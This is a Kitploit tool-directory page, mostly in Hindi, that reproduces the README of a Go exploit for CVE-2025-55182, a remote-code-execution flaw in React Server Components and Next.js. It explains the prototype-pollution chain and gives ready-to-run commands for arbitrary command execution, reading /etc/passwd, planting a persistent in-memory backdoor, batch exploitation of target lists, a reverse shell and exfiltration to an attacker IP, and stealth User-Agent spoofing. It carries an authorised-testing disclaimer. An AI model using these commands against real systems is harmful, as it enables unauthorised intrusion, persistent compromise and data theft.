Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-golang-PoC — CVE-2025-55182 React Server Components RCE - Go PoC | Kitploit
उपकरण/GitHubGitHub/keklick1337/cve-2025-55182-golang-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubkeklick1337/cve-2025-55182-golang-poc

CVE-2025-55182-golang-PoC

CVE-2025-55182 React Server Components RCE - Go PoC

रिपॉजिटरी देखेंवेबसाइट
618 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-55182 React Server Components RCE - Go PoC

⚠️ केवल अधिकृत सुरक्षा परीक्षण के लिए ⚠️

विवरण

CVE-2025-55182 (जिसे CVE-2025-66478 के नाम से भी जाना जाता है) React Server Components (Flight प्रोटोकॉल) में एक गंभीर Remote Code Execution (RCE) भेद्यता है। यह टूल सुरक्षा अनुसंधान और अधिकृत पेनेट्रेशन परीक्षण के लिए PoC का एक Go कार्यान्वयन है।

प्रभावित संस्करण:

  • react-server-dom-webpack: 19.0.0 - 19.2.0
  • Next.js: 15.x (पैच से पहले: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7)
  • Next.js: 16.x (16.0.7 से पहले)
  • Next.js: 14.3.0-canary.77 और बाद के कैनरी संस्करण

भेद्यता विवरण

यह एक्सप्लॉइट Flight प्रोटोकॉल डिसीरियलाइज़ेशन में प्रोटोटाइप पॉल्यूशन का लाभ उठाता है:

  1. Chunk संदर्भ प्राप्त करने के लिए $@ डिसीरियलाइज़ेशन का उपयोग करता है
  2. Chunk.prototype.then को रूट ऑब्जेक्ट के then प्रॉपर्टी के रूप में रखता है
  3. नियंत्रित नकली चंक के साथ initializeModelChunk को कॉल करने के लिए स्टेटस को RESOLVED_MODEL पर सेट करता है
  4. Blob डिसीरियलाइज़ेशन को ट्रिगर करता है जो हमलावर पेलोड के साथ response._formData.get को कॉल करता है
  5. मनमाना कोड निष्पादन के लिए response._formData.get को Function कंस्ट्रक्टर पर सेट करता है

विशेषताएँ

  • पूर्ण RCE क्षमता - आउटपुट के साथ मनमाने कमांड निष्पादित करें
  • भेद्यता जाँच मोड - एक्सप्लॉइटेशन के बिना सुरक्षित पहचान
  • Next.js संस्करण पहचान - स्वचालित संस्करण फिंगरप्रिंटिंग
  • मेमोरी शेल इंजेक्शन - /exec?cmd= पर स्थायी बैकडोर
  • बैच स्कैनिंग - JSON आउटपुट के साथ मल्टी-थ्रेडेड स्कैनिंग
  • व्यापक प्रॉक्सी समर्थन:
    • प्रमाणीकरण के साथ/बिना SOCKS5
    • SOCKS4/SOCKS4a
    • प्रमाणीकरण के साथ/बिना HTTP/HTTPS प्रॉक्सी
  • स्टील्थ मोड - ब्राउज़र, क्रॉलर, सुरक्षा User-Agent
  • रेट लिमिटिंग - अनुरोधों के बीच कॉन्फ़िगर करने योग्य विलंब
  • रिवर्स शेल - mkfifo + nc (Alpine/busybox पर काम करता है)
  • डेटा एक्सफिल्ट्रेशन - हमलावर सर्वर पर कमांड आउटपुट POST करें
  • क्रॉस-प्लेटफ़ॉर्म बिल्ड - 30+ OS/आर्किटेक्चर संयोजन
  • JSON आउटपुट - स्वचालन के लिए मशीन-पठनीय परिणाम

इंस्टॉलेशन

प्री-बिल्ट बाइनरी

अपने प्लेटफ़ॉर्म के लिए नवीनतम रिलीज़ GitHub Releases से डाउनलोड करें।

उपलब्ध बाइनरी:

  • Linux: amd64, 386, arm, arm64, mips, mipsle, mips64, riscv64, ppc64, s390x
  • Windows: amd64, 386, arm64
  • macOS: amd64 (Intel), arm64 (Apple Silicon)
  • FreeBSD, OpenBSD, NetBSD: amd64, 386, arm, arm64
  • और भी...

स्रोत से

root@kitploit:~
# Clone repository
git clone https://github.com/keklick1337/CVE-2025-55182-golang-PoC.git
cd CVE-2025-55182-golang-PoC

# Build for current platform
go build -o cve-2025-55182 .

# Or build for all platforms
chmod +x build.sh
./build.sh

स्रोत से बिल्ड करें

./build.sh चलाने के बाद, सभी समर्थित प्लेटफ़ॉर्मों के लिए बाइनरी build/ निर्देशिका में उपलब्ध होंगी।

उपयोग

मूल कमांड

root@kitploit:~
# Check single target for vulnerability
./cve-2025-55182 -u http://target:3000 --check

# Detect Next.js version
./cve-2025-55182 -u http://target:3000 --version-check

# Execute command with output
./cve-2025-55182 -u http://target:3000 -c "id"
./cve-2025-55182 -u http://target:3000 -c "cat /etc/passwd"

मेमोरी शेल (स्थायी बैकडोर)

root@kitploit:~
# Inject memory shell (checks if already installed first)
./cve-2025-55182 -u http://target:3000 --memshell

# Test if memory shell is active
./cve-2025-55182 -u http://target:3000 --test-shell

# Execute command via memory shell
./cve-2025-55182 -u http://target:3000 --shell-exec "cat /etc/passwd"

# After injection, you can also use curl directly:
curl 'http://target:3000/exec?cmd=id'
curl 'http://target:3000/exec?cmd=whoami'

कस्टम हेडर और SSL बाईपास

root@kitploit:~
# Add custom headers (can be used multiple times)
./cve-2025-55182 -u http://target:3000 --check -H 'Authorization: Bearer token123'
./cve-2025-55182 -u http://target:3000 --check -H 'Host: example.com' -H 'X-Forwarded-For: 127.0.0.1'

# Skip SSL certificate verification (for self-signed certs)
./cve-2025-55182 -u https://target:3000 --check -k
./cve-2025-55182 -u https://target:3000 --check --insecure

# Combine with other options
./cve-2025-55182 -u https://target:3000 -c "id" -k -H 'Cookie: session=abc123' --proxy socks5://127.0.0.1:1080

प्रॉक्सी समर्थन

root@kitploit:~
# SOCKS5 with authentication
./cve-2025-55182 -u http://target:3000 --check --proxy socks5://user:[email protected]:1080

# SOCKS5 without authentication
./cve-2025-55182 -u http://target:3000 --check --proxy socks5://127.0.0.1:1080

# SOCKS4 proxy
./cve-2025-55182 -u http://target:3000 --check --proxy socks4://127.0.0.1:1080

# HTTP proxy
./cve-2025-55182 -u http://target:3000 --check --proxy http://127.0.0.1:8080

बैच स्कैनिंग

root@kitploit:~
# Batch check from file
./cve-2025-55182 --urls targets.txt --check

# Batch scan with JSON output
./cve-2025-55182 --urls targets.txt --check --json -o results.json

# Batch scan with multiple threads and stealth
./cve-2025-55182 -f targets.txt --check --threads 20 --stealth crawler --delay 2s

# Save vulnerable targets to file
./cve-2025-55182 -f targets.txt --check -o vulnerable.txt

# Batch memory shell injection
./cve-2025-55182 --urls targets.txt --memshell --workers 10

# Batch command execution
./cve-2025-55182 --urls targets.txt -c "id" --threads 5

नेटवर्क एक्सफिल्ट्रेशन

root@kitploit:~
# Reverse shell (mkfifo + nc, works on Alpine)
./cve-2025-55182 -u http://target:3000 --revshell 10.0.0.1 4444

# Start listener on attacker machine first:
nc -lvnp 4444

# Exfiltrate command output via HTTP POST
./cve-2025-55182 -u http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444

# Start listener: nc -lvnp 4444

विकल्प

प्रॉक्सी प्रकार

root@kitploit:~
socks5://user:pass@ip:port  - SOCKS5 with authentication
socks5://ip:port            - SOCKS5 without authentication  
socks5h://ip:port           - SOCKS5 with remote DNS resolution
socks4://ip:port            - SOCKS4 proxy
socks4a://ip:port           - SOCKS4a proxy
http://user:pass@ip:port    - HTTP proxy with authentication
http://ip:port              - HTTP proxy without authentication
https://ip:port             - HTTPS proxy

स्टील्थ मोड

मोडविवरण
browserवास्तविक ब्राउज़र अनुरोधों की नकल करता है (Chrome, Firefox, Safari, Edge) - डिफ़ॉल्ट
crawlerसर्च इंजन क्रॉलर की नकल करता है (Googlebot, Bingbot, Baiduspider, आदि)
securityसुरक्षा स्कैनर User-Agent का उपयोग करता है (Nessus, Nuclei)

मेमोरी शेल

मेमोरी शेल सुविधा एक स्थायी बैकडोर इंजेक्ट करती है जो:

  1. पहले जाँचता है - इंजेक्शन से पहले, सत्यापित करता है कि शेल पहले से इंस्टॉल है या नहीं
  2. http.Server.prototype.emit को हुक करता है - सभी HTTP अनुरोधों को इंटरसेप्ट करता है
  3. /exec एंडपॉइंट बनाता है - cmd क्वेरी पैरामीटर स्वीकार करता है
  4. रीस्टार्ट तक बना रहता है - सर्वर मेमोरी में बना रहता है
root@kitploit:~
# After injection:
curl 'http://target:3000/exec?cmd=id'
curl 'http://target:3000/exec?cmd=ls+-la'
curl 'http://target:3000/exec?cmd=cat+/etc/passwd'

प्रोजेक्ट संरचना

root@kitploit:~
.
├── main.go                   # CLI entry point
├── pkg/
│   ├── colors/
│   │   └── colors.go         # Terminal colors with --nocolor support
│   ├── exploit/
│   │   └── exploit.go        # Core exploit logic, memory shell, version detection
│   ├── proxy/
│   │   └── proxy.go          # SOCKS4/5, HTTP proxy support
│   ├── scanner/
│   │   └── scanner.go        # Batch scanning with JSON output
│   └── stealth/
│       └── stealth.go        # User-Agent randomization
├── build.sh                  # Cross-platform build script
├── go.mod                    # Go module file
├── go.sum                    # Go dependencies
└── README.md                 # This file

क्रॉस-प्लेटफ़ॉर्म बिल्ड

build.sh स्क्रिप्ट 30+ प्लेटफ़ॉर्मों के लिए बिल्ड करती है:

  • Linux: amd64, 386, arm, arm64, mips, mipsle, mips64, riscv64, ppc64, s390x
  • Windows: amd64, 386, arm64 (.exe)
  • macOS: amd64 (Intel), arm64 (Apple Silicon)
  • FreeBSD: amd64, 386, arm, arm64
  • OpenBSD: amd64, 386, arm, arm64
  • NetBSD: amd64, 386, arm, arm64
  • DragonFly BSD: amd64
  • Solaris/Illumos: amd64
  • Plan 9: amd64, 386
  • AIX: ppc64
root@kitploit:~
chmod +x build.sh
./build.sh

JSON आउटपुट प्रारूप

--json फ़्लैग का उपयोग करने पर, परिणाम JSONL प्रारूप में सहेजे जाते हैं (प्रति पंक्ति एक JSON):

root@kitploit:~
{"url":"http://target:3000","vulnerable":true,"version":"15.0.3","checked_at":"2025-12-06T12:00:00Z","response_time_ms":1234}

पूर्ण रिपोर्ट (_report.json) में शामिल है:

root@kitploit:~
{
  "scan_time": "2025-12-06T12:00:00Z",
  "total_urls": 100,
  "vulnerable_count": 5,
  "safe_count": 90,
  "timeout_count": 5,
  "results": [...]
}

संस्करण पहचान

यह टूल Next.js संस्करण का पता लगा सकता है:

  • X-Powered-By हेडर
  • HTML/JS स्रोत (__NEXT_DATA__, /_next/ पथ)
  • बिल्ड मेनिफेस्ट पैटर्न

भेद्य संस्करण लाल रंग में हाइलाइट किए जाते हैं।

अस्वीकरण

⚠️ महत्वपूर्ण कानूनी सूचना ⚠️

यह टूल केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।

इच्छित उपयोग

  • सुरक्षा अनुसंधान और भेद्यता आकलन
  • लिखित अनुमति के साथ अधिकृत पेनेट्रेशन परीक्षण
  • अपने स्वयं के अनुप्रयोगों और इन्फ्रास्ट्रक्चर का परीक्षण
  • नियंत्रित लैब वातावरण में शैक्षिक प्रदर्शन
  • पैच और सुरक्षा उपाय विकसित करना

निषिद्ध उपयोग

इस टूल का उपयोग करना सख्त रूप से निषिद्ध है:

  • उन प्रणालियों के विरुद्ध जिनके स्वामी आप नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित प्राधिकरण नहीं है
  • किसी भी दुर्भावनापूर्ण, अवैध, या अनधिकृत गतिविधियों के लिए
  • कंप्यूटर प्रणालियों या नेटवर्क तक अनधिकृत पहुँच प्राप्त करने के लिए
  • किसी भी लागू स्थानीय, राज्य, राष्ट्रीय, या अंतर्राष्ट्रीय कानूनों के उल्लंघन में
  • बिना प्राधिकरण के प्रणालियों को बाधित, क्षतिग्रस्त, या समझौता करने के लिए

कानूनी चेतावनी

कंप्यूटर प्रणालियों तक अनधिकृत पहुँच दुनिया भर के अधिकांश क्षेत्राधिकारों में एक आपराधिक अपराध है, जिसमें निम्न शामिल हैं पर इन्हीं तक सीमित नहीं:

  • 🇺🇸 यूएसए: Computer Fraud and Abuse Act (CFAA) - 20 साल तक की कैद
  • 🇪🇺 यूरोपीय संघ: सूचना प्रणालियों के विरुद्ध हमलों पर निर्देश 2013/40/EU
  • 🇷🇺 रूस: आपराधिक संहिता के अनुच्छेद 272-274
  • 🇬🇧 यूके: Computer Misuse Act 1990
  • 🇩🇪 जर्मनी: §202a-202d StGB
  • 🇨🇳 चीन: आपराधिक कानून के अनुच्छेद 285-287

कोई वारंटी नहीं

यह सॉफ़्टवेयर "जैसा है" (AS IS) प्रदान किया गया है, बिना किसी प्रकार की स्पष्ट या निहित वारंटी के। लेखक और कॉपीराइट धारक इस सॉफ़्टवेयर के उपयोग से उत्पन्न किसी भी दावे, क्षति, या अन्य दायित्व के लिए उत्तरदायी नहीं होंगे।

उपयोगकर्ता की जिम्मेदारी

इस टूल को डाउनलोड करके, इंस्टॉल करके, या उपयोग करके, आप स्वीकार करते हैं कि:

  1. आप अपने कार्यों के लिए पूर्ण रूप से जिम्मेदार हैं
  2. आप इस टूल का उपयोग केवल उन्हीं प्रणालियों पर करेंगे जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट प्राधिकरण है
  3. आप इस सॉफ़्टवेयर के उपयोग से जुड़े सभी जोखिमों को समझते हैं और स्वीकार करते हैं
  4. लेखक किसी भी दुरुपयोग या हुई क्षति के लिए कोई जिम्मेदारी नहीं लेता है

यदि आप इन शर्तों से सहमत नहीं हैं, तो इस टूल का उपयोग न करें।

लेखक

Vladislav Tislenko aka keklick1337
दिनांक: 2025-12-05

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।


जिम्मेदारी से उपयोग करें। कानून का पालन करें। 🔐

टूल डाउनलोड करें
विकल्पविवरण
-u, --urlलक्ष्य URL (जैसे, http://localhost:3000)
-f, --fileलक्ष्य URL वाली फ़ाइल (प्रति पंक्ति एक)
--urls-f/--file का उपनाम
-o, --outputभेद्य लक्ष्यों के लिए आउटपुट फ़ाइल
--jsonपरिणाम JSON प्रारूप में आउटपुट करें
-c, --commandनिष्पादित करने के लिए कमांड (आउटपुट के साथ)
--checkभेद्यता की जाँच करें
--version-checkNext.js संस्करण का पता लगाएं
--proxyप्रॉक्सी URL (socks5://user:pass@ip:port, socks4://ip:port, http://ip:port)
-H, --headerकस्टम हेडर (कई बार उपयोग किया जा सकता है)
-k, --insecureSSL/TLS प्रमाणपत्र सत्यापन छोड़ें
--stealthस्टील्थ मोड: browser, crawler, security (डिफ़ॉल्ट: browser)
--delayअनुरोधों के बीच विलंब (जैसे, 2s, 500ms)
--variantsगहन जाँच के लिए कई पेलोड वेरिएंट का उपयोग करें
--memshellमेमोरी शेल इंजेक्ट करें (स्थायी बैकडोर)
--test-shellजाँचें कि मेमोरी शेल सक्रिय है या नहीं
--shell-execमेमोरी शेल के माध्यम से कमांड निष्पादित करें
--revshell IP PORTरिवर्स शेल स्थापित करें
--exfil CMD IP PORTकमांड निष्पादित करें और आउटपुट POST करें
-t, --timeoutसेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 15)
--threadsसमवर्ती थ्रेड की संख्या (डिफ़ॉल्ट: 10)
--workers--threads का उपनाम
--nocolorरंगीन आउटपुट अक्षम करें (Windows/पाइप के लिए)
-h, --helpसहायता संदेश दिखाएं
-v, --versionसंस्करण दिखाएं